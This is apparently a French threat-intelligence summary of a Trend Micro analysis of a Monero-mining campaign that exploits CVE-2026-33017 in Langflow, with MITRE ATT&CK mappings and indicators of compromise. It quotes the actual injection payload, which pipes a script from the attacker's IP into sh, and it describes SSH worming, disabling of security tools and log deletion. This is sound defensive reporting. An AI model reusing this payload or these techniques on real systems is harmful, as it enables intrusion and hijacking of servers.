🔍 Contexte

Publié le 23 juin 2026 par Trend Micro (Simon Dulude et John Zhang), cet article présente une analyse technique complète d’une campagne de cryptominage exploitant CVE-2026-33017, une vulnérabilité d’exécution de code à distance non authentifiée dans Langflow, un framework Python de construction de workflows LLM.

🎯 Vecteur d’accès initial

L’exploitation cible l’endpoint POST /api/v1/build_public_tmp/{flow_id}/flow de Langflow, qui évalue du code Python sans authentification. L’attaquant injecte __import__('os').system('curl http://83.142.209.214:8080/isp.sh | sh') pour déclencher la chaîne d’infection. Le même flow_id UUID (0ee284cc-0eb1-493f-bc60-94fa8d1cfd18) est réutilisé dans toutes les tentatives. La fenêtre d’observation couvre 19 jours (27 mars – 15 avril 2026).

🐚 Dropper : isp.sh

Le script bash isp.sh :

  • Vérifie si le mineur est déjà actif
  • Crée un répertoire de persistance caché /var/tmp/.xlamb
  • Télécharge le binaire lambsys via curl ou wget
  • Lance lambsys en arrière-plan avec nohup
  • Se propage via SSH en énumérant ~/.ssh/known_hosts, id_rsa, id_ed25519, id_dsa et SSH_AUTH_SOCK

⚙️ Binaire principal : lambsys.elf

lambsys est un exécutable ELF écrit en Go, compressé avec UPX 4.24. Séquence d’exécution :

  1. Élève ulimit -n à 65 535
  2. Tue les processus rivaux (Kinsing, WatchDog, Rocke/KORKERDS, Outlaw) via pkill, netstat sur 12 ports miniers, et fichiers PID cachés dans /tmp/.X11-unix/ et /tmp/.systemd.*
  3. Supprime les comptes backdoor akay et vfinder
  4. Désactive AppArmor, UFW, iptables, SELinux, le watchdog NMI kernel, et l’agent Alibaba Cloud Aliyun
  5. Supprime /var/log/syslog
  6. Installe deux watchdogs de persistance : cron toutes les 5 minutes et boucle bash init_rmount toutes les 60 secondes
  7. Verrouille /tmp et /var/tmp avec chattr +iua

📡 C&C et minage

  • Beacon HTTP POST vers 83.142.209.214:80/status.php toutes les ~128 secondes (JSON : {"downloading":false,"running":true,"timestamp":...})
  • Téléchargement de ks.tar depuis :8080, vérifié par MD5 (46096a72d84db5f1dafd944fcf6571c8)
  • Extraction du mineur procq (XMRig personnalisé) dans un répertoire caché ./. /. /procq
  • Connexion au pool de minage sur TCP/3333 avec le wallet XMR 47VVuaLN...JkjbZT31
  • Requête DNS vers ipinfo.io pour géolocalisation avant connexion au pool

🧬 Lignée et attribution

Lambsys présente une filiation avec la famille KORKERDS/MALXMR (2018-2019) : même suppression des comptes akay/vfinder, dropper nommé is.shisp.sh, ver SSH via known_hosts. Le wallet XMR est unique à cette famille. L’opérateur est considéré comme standalone, distinct de Kinsing ou TeamTNT. Le build précédent date de mai 2024 (C&C : 94.156.64.241, beacon /r.php).

📊 Type d’article

Analyse technique approfondie publiée par Trend Micro, visant à documenter une chaîne d’attaque complète exploitant l’infrastructure IA exposée, avec cartographie MITRE ATT&CK et indicateurs de compromission.

🧠 TTPs et IOCs détectés

TTP

  • T1595.002 — Active Scanning: Vulnerability Scanning (Reconnaissance)
  • T1588.002 — Obtain Capabilities: Tool (Resource Development)
  • T1190 — Exploit Public-Facing Application (Initial Access)
  • T1059.004 — Command and Scripting Interpreter: Unix Shell (Execution)
  • T1059.006 — Command and Scripting Interpreter: Python (Execution)
  • T1106 — Native API (Execution)
  • T1053.003 — Scheduled Task/Job: Cron (Persistence)
  • T1543.004 — Create or Modify System Process: Systemd Service (Persistence)
  • T1027 — Obfuscated Files or Information (Defense Evasion)
  • T1036.005 — Masquerading: Match Legitimate Name or Location (Defense Evasion)
  • T1070.002 — Indicator Removal: Clear Linux Logs (Defense Evasion)
  • T1070.004 — Indicator Removal: File Deletion (Defense Evasion)
  • T1140 — Deobfuscate/Decode Files or Information (Defense Evasion)
  • T1222 — File and Directory Permissions Modification (Defense Evasion)
  • T1489 — Service Stop (Defense Evasion)
  • T1562.001 — Impair Defenses: Disable or Modify Tools (Defense Evasion)
  • T1562.004 — Impair Defenses: Disable or Modify System Firewall (Defense Evasion)
  • T1564.001 — Hide Artifacts: Hidden Files and Directories (Defense Evasion)
  • T1574.006 — Hijack Execution Flow: Dynamic Linker Hijacking (Defense Evasion)
  • T1497 — Virtualization/Sandbox Evasion (Defense Evasion)
  • T1552.004 — Unsecured Credentials: Private Keys (Credential Access)
  • T1016 — System Network Configuration Discovery (Discovery)
  • T1057 — Process Discovery (Discovery)
  • T1082 — System Information Discovery (Discovery)
  • T1083 — File and Directory Discovery (Discovery)
  • T1614 — System Location Discovery (Discovery)
  • T1021.004 — Remote Services: SSH (Lateral Movement)
  • T1071.001 — Application Layer Protocol: Web Protocols (Command and Control)
  • T1105 — Ingress Tool Transfer (Command and Control)
  • T1132.001 — Data Encoding: Standard Encoding (Command and Control)
  • T1020 — Automated Exfiltration (Exfiltration)
  • T1496 — Resource Hijacking (Impact)
  • T1531 — Account Access Removal (Impact)

IOC

  • IPv4 : 83.142.209.214AbuseIPDB · VT · ThreatFox
  • IPv4 : 94.156.64.241AbuseIPDB · VT · ThreatFox
  • Domaines : ipinfo.ioVT · URLhaus · ThreatFox
  • URLs : http://83.142.209.214:8080/isp.shURLhaus
  • URLs : http://83.142.209.214:8080/lambsysURLhaus
  • URLs : http://83.142.209.214:8080/ks.tarURLhaus
  • URLs : http://83.142.209.214:80/status.phpURLhaus
  • URLs : http://83.142.209.214:80/setup_status.phpURLhaus
  • SHA256 : 33588aa4VT · MalwareBazaar
  • SHA256 : 71af8bd9VT · MalwareBazaar
  • MD5 : 46096a72d84db5f1dafd944fcf6571c8VT · MalwareBazaar
  • CVEs : CVE-2026-33017NVD · CIRCL
  • CVEs : CVE-2025-3248NVD · CIRCL
  • Fichiers : isp.sh
  • Fichiers : lambsys
  • Fichiers : lambsys.elf
  • Fichiers : procq
  • Fichiers : ks.tar
  • Fichiers : init_rmount
  • Chemins : /var/tmp/.xlamb
  • Chemins : /var/tmp/.xlamb/lambsys
  • Chemins : /var/tmp/init_rmount
  • Chemins : /var/tmp/check_process.log
  • Chemins : /var/tmp/run.log
  • Chemins : /var/tmp/run.log2
  • Chemins : /tmp/.X11-unix/01
  • Chemins : /tmp/.X11-unix/11
  • Chemins : /tmp/.X11-unix/22
  • Chemins : /tmp/.systemd.1
  • Chemins : /tmp/.systemd.2
  • Chemins : /tmp/.systemd.3
  • Chemins : /var/spool/cron/crontabs/user

Malware / Outils

  • lambsys (other)
  • isp.sh (loader)
  • procq (other)
  • XMRig (other)
  • KORKERDS (other)
  • MALXMR (other)

🟢 Indice de vérification factuelle : 87/100 (haute)

  • ✅ trendmicro.com — source reconnue (liste interne) (20pts)
  • ✅ 54209 chars — texte complet (fulltext extrait) (15pts)
  • ✅ 32 IOCs dont des hashes (15pts)
  • ✅ 2/8 IOCs confirmés (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (12pts)
  • ✅ 33 TTPs MITRE identifiées (15pts)
  • ✅ date extraite du HTML source (10pts)
  • ⬜ aucun acteur de menace nommé (0pts)
  • ⬜ 0/2 CVE(s) confirmée(s) (0pts)

IOCs confirmés externellement :

  • 83.142.209.214 (ip) → AbuseIPDB (100% confiance, 325 signalements) + VT (16/91 détections)
  • 94.156.64.241 (ip) → VT (12/91 détections)

🔗 Source originale : https://www.trendmicro.com/en_us/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html